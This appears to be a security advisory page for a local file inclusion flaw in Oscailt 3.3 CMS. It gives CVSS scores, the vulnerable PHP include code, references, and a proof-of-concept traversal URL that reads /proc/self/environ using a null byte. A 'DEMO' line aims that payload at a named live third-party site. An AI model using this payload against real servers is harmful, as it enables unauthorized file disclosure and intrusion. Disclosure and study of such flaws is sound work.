Oscailt 3.3 CMS Local File Inclusion

2010.01.02
Credit: s4r4d0
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-59


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[0] Oscailt 3.3 CMS [0] Download: http://sourceforge.net/projects/oscailt/ [0] Bug: Local File Inclusion in index.php file ! [0] Author: s4r4d0@yahoo.com [0] Team: Fatal Error [0] Poc: http://www.site.com/index.php?obj_id=/../../../../../../../../../../proc/self/environ%00 [0] DEMO:http://imemc.org/index.php?obj_id=/../../../../../../../../../../proc/self/environ%00 [0] Greetz: Elemento_pcx - z4i0n - m4v3rick - HADES - Hualdo - Derf - DD3str0y3r - Obz !!! [0] Made in Brazil - SP [0] Source Code: # SecurityReason Note : # # The option "Use Friendly URL's" in configuration must be set off # # Vulnerable Code in index.php : # # $target_indyobject_id = getRequestTargetObjectID(); # ... # if(!$use_live) # { # $cachefile = getObjectCacheIndexFile($target_indyobject_id); # if(file_exists($cachefile)) # { # include_once($cachefile); # } # # in function getObjectCacheIndexFile() we have ... # # function getObjectCacheIndexFile($id) # { # $dir = getObjectCacheDir($id); # $f = $id.'.inc'; # return $dir.$f; # } # # As we can see , $cachefile try include inc file in cache dir. # # magic_quotes = Off // to use %00 null byte # # - sp3x # [0]Reference: http://securityreason.com/exploitalert/7422

References:

http://xforce.iss.net/xforce/xfdb/54023
http://www.vupen.com/english/advisories/2009/3096
http://securityreason.com/exploitalert/7422
http://secunia.com/advisories/37180
http://packetstormsecurity.org/0910-exploits/oscailt33-lfi.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top